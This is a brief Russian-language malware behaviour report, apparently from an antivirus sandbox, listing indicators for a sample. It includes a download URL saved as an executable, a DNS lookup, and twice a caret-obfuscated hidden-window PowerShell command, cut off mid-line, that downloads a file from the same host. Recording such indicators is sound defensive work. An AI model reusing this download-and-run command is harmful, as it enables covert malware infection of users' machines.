Техническая информация
- http://mondayhelthc.top/read.php?f=0.dat как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "P^o^WERSh^ELl.E^xE^ -^ExEc^UtiOnPo^L^ic^Y ^BY^Pa^S^s ^-n^OpROfilE -w^i^NDOW^sty^l^E ^hiDDEN (^NeW^-objEC^T S^Ys^tem.net.WE^bCL^i^e^n^T)^.DowN^l^oAd^fIL^E('http://mondayh...
- DNS ASK mo####helthc.top
- '<SYSTEM32>\cmd.exe' /c "P^o^WERSh^ELl.E^xE^ -^ExEc^UtiOnPo^L^ic^Y ^BY^Pa^S^s ^-n^OpROfilE -w^i^NDOW^sty^l^E ^hiDDEN (^NeW^-objEC^T S^Ys^tem.net.WE^bCL^i^e^n^T)^.DowN^l^oAd^fIL^E('http://mondayh...' (со скрытым окном)